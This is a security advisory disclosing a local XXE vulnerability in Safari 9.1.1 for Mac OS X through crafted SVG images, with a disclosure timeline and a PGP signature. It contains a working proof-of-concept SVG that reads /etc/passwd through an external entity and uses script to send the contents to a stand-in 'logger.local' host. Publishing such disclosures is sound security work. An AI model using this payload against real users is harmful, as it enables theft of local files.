Advisory ID: SGMA16-003
Title: Apple Safari for Mac OS X SVG local XXE
Product: Apple Safari for Mac OS X
Version: 9.1.1 and probably prior
Vendor: apple.com
Vulnerability type: XXE
Risk level: Medium
Credit: Filippo Cavallarin - wearesegment.com
CVE: N/A
Vendor notification: 2015-04-08
Vendor fix: N/A
Public disclosure: 2016-07-05
Details
Safari for MACOSX is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from local computer by tricking a user
into opening and SVG image from a local location (ie USB key).
This vulnerability is mitigated by the file quarantine and do not work with downloaded files.
The vendor has been notified more than one year before public disclosure and the answer was that the issue was
still under analisys. We contacted the vendor again a few weeks before public disclosure but we got no reply.
Title: Apple Safari for Mac OS X SVG local XXE
Product: Apple Safari for Mac OS X
Version: 9.1.1 and probably prior
Vendor: apple.com
Vulnerability type: XXE
Risk level: Medium
Credit: Filippo Cavallarin - wearesegment.com
CVE: N/A
Vendor notification: 2015-04-08
Vendor fix: N/A
Public disclosure: 2016-07-05
Details
Safari for MACOSX is prone to an XXE vulnerability when processing crafted SVG images.
An attacker may use this vulnerability to steal files from local computer by tricking a user
into opening and SVG image from a local location (ie USB key).
This vulnerability is mitigated by the file quarantine and do not work with downloaded files.
Proof of concept:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script>
var logger = "http://logger.local/?file=" + encodeURIComponent(document.getElementsByTagName("text")[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttrib
uteNS('http://www.w3.org/1999/xlink','href', logger);
</script>
</svg>
Notes
The vendor has been notified more than one year before public disclosure and the answer was that the issue was
still under analisys. We contacted the vendor again a few weeks before public disclosure but we got no reply.
Solution
N/A
References
https://www.wearesegment.com/research/Apple-Safari-for-Mac-OS-X-SVG-loca
l-XXE
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJXe2vsAAoJENKaW7brYyGoFlUP/ibdR7ztrcuBXlvRZpoTpMAR
szEBrXYd2ZBXBKYI9J+BEsDPh2VFOL0J5nvhnLmWRj963Br7bx2eKo1vjbIIQRfS
SV+5CRHRJkvYf+pl4O9XA3tBlDehcb8eZkdIIy55Bk5ex1r0wgGGFXI+8OZbY8bO
ZE9vM4cZEIZ+jgpNf3ztlFSslCsFe0vmznoUyBTaBBnmakTwRXVJlL5+unJuTIUC
NTuvel/nNTGb0wzhEG8xyMl2n4os0LddO1+Xt8NVYZ0xibyRWDd393S0awZ3+hq+
AQIWs0kr9LfNZ5lteaS5VcS0d895qvCH7+UJdIJi4Nl1mKqUV9vYw+DmAGTWjnon
NCzUcl5JQTVM4iSPdfxIpLA5NAsfIHsGF4CwLG2lbMlCgKiM4gh2vE7KV+tTPKN4
XsIU2az3ZQCKZWjZMKsNb+9rRT7zIt1Uj2tFKqzK/YtroXtUIW1Zca7E9PqEf1GS
Q1+UrK6xy8D4TnGSoorqESKBLAp9csLdHgGSuitggamg8irRaQ9iwwqHBYc4bhtq
kNQPxHhCCKPRglsoqjkNzPKoGiqM4kUICSrFIXJH3rlX+1zdpaBfhjGzCaiOzN7h
K9gkv6qWRrc2dgci5OqXtAGbOEaJT4mRqBSOU9rv/0WdLBfkNLCO92IxBv1LoEEn
QOaUSQej4VD10WXinhlv
=Ua3A
-----END PGP SIGNATURE-----
[ reply ]